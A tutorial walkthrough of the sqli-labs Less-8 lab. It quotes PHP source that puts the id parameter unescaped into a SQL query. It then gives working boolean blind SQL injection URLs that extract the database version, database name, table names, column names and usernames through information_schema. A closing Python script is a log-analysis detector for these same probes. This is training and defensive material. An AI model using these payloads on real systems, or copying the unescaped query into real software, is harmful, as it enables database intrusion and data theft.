Sqli-labs Less-8 Boolean injection

The source code is as follows:

$id = $_GET['id'];
// $id goes straight into the query string without any validation or escaping
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);

if ($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="5" color="#FFFF00">';
    // unlike Less-5, the error output below is commented out, so no MySQL error text reaches the page
    //echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}

As can be seen, compared with Less-5, the Less-8 source has the mysql_error() statement commented out, so error-based injection is ruled out here. Boolean-based (blind) injection or time-based injection can be used instead.

Here a Boolean-based injection is demonstrated.


First, look at the version with version():

http://127.0.0.1/sql/Less-8/?id=1' and left(version(),1)='5' %23

This statement checks whether the first character of the version number is 5; it obviously returns the correct page.

When the guessed version digit is wrong, the page does not display "You are in..." correctly.

Continuing character by character, the database version is found to be 5.6.17.

Burp or a Python script can be used to make this more efficient.


Next, look at the length of the database name:

http://127.0.0.1/sql/Less-8/?id=1' and length(database())=8 %23

With the length set to 8 the page returns normally, while other values give the error page, indicating that the length is 8.


Guess the first character of the database name:

http://127.0.0.1/sql/Less-8/?id=1' and left(database(),1)>'n' --+

database() is security, so we check whether its first character is greater than 'n'; clearly 's' > 'n', so the correct page is returned. When the value is not known in advance, binary search (dichotomy) can be used to speed up the injection.


Guess the second character of the database name:

The first character is s; now we check whether the first two characters are greater than 'sn':

http://127.0.0.1/sql/Less-8/?id=1' and left(database(),2)>'sn' --+

Continuing by analogy, the database name turns out to be security.


Get the tables in the security database:

http://127.0.0.1/sql/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100--+

Here the same binary search is used, testing until the comparison returns the correct page.

The value here should be 101, because the first table is email and ascii('e') = 101.


How to get the second character of the first table name? We have already learned the substr() function; substr(..., 2, 1) does it.

http://127.0.0.1/sql/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>108--+


How to get the second table? Think about it for a moment!

Notice that the statement above uses limit 0,1. The 0 means start from the beginning and take one row, i.e. the first table. To get the second table, use limit 1,1.

http://127.0.0.1/sql/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>113--+

> 113 returns the correct page here, because the second table is referers, whose first character is r.

The rest is just repeating the process above, so it is not reproduced here; the principle has been explained clearly.

Following this method to the end, the names of all the tables can be obtained.


Using regexp to enumerate the columns of the users table:

http://127.0.0.1/sql/Less-8/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us' limit 0,1)--+


Using the ord() and mid() functions to get the contents of the users table:

http://127.0.0.1/sql/Less-8/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+


The remaining steps are exactly the same as in Less-5 and are not demonstrated here; later a Python script can be written to improve the injection efficiency.
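Seen from the server side, the bisection above leaves a very recognisable trail: one client re-sending the same query with only the comparison constant changed. As an added example (not part of the original post), the Python script below scans constructed Apache-style access-log lines for the functions this lesson relies on (length(), left(), ascii(substr()), ord(mid()), information_schema, regexp), normalises each decoded query into a template with the constants replaced, and reports clients that sent several variants of one template.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post): 10.0.0.5 runs
# Less-8 style probes, bisecting the first character of a table name.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2020:12:00:01 +0800] "GET /sql/Less-8/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2020:12:00:02 +0800] "GET /sql/Less-8/?id=1'%20and%20length(database())=8%20%23 HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2020:12:00:03 +0800] "GET /sql/Less-8/?id=1'%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>100--+ HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2020:12:00:04 +0800] "GET /sql/Less-8/?id=1'%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>110--+ HTTP/1.1" 200 490
10.0.0.5 - - [10/Mar/2020:12:00:05 +0800] "GET /sql/Less-8/?id=1'%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>105--+ HTTP/1.1" 200 490
10.0.0.9 - - [10/Mar/2020:12:00:06 +0800] "GET /sql/Less-8/?id=2 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"GET (?P<path>\S+) HTTP/')
# The functions and schema this lesson leans on; tune for your own application's parameters.
PROBE_RE = re.compile(
    r"\b(?:length|left|ascii|ord|mid|substr)\s*\(|information_schema\.|\bregexp\b",
    re.IGNORECASE,
)

def probe_template(decoded_query):
    """Replace each compared constant with N so that the bisection steps
    (>100, >110, >105, ...) of one probe collapse onto a single key."""
    return re.sub(r"([<>=])\s*'?\w+'?", r"\1N", decoded_query.lower())

def analyze(log_text):
    """Return {ip: (probe_requests, max_variants_of_one_template)} for
    every client that sent at least one request matching PROBE_RE."""
    probes = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("path").partition("?")[2])
        if PROBE_RE.search(decoded):
            probes[m.group("ip")][probe_template(decoded)].add(decoded)
    return {ip: (sum(len(v) for v in t.values()), max(len(v) for v in t.values()))
            for ip, t in probes.items()}

def suspicious_clients(log_text, min_variants=3):
    """Clients that re-sent one probe template with >= min_variants different constants."""
    return sorted(ip for ip, (_, variants) in analyze(log_text).items()
                  if variants >= min_variants)

if __name__ == "__main__":
    for ip, (count, variants) in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {count} probe requests, {variants} variants of one template")
    print("suspicious:", suspicious_clients(SAMPLE_LOG))
```

On the constructed log this flags 10.0.0.5 (four probe requests, three variants of the ascii(substr(...)) template) and ignores 10.0.0.9, whose plain id=2 request matches nothing.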


Origin www.cnblogs.com/zhengna/p/12577566.html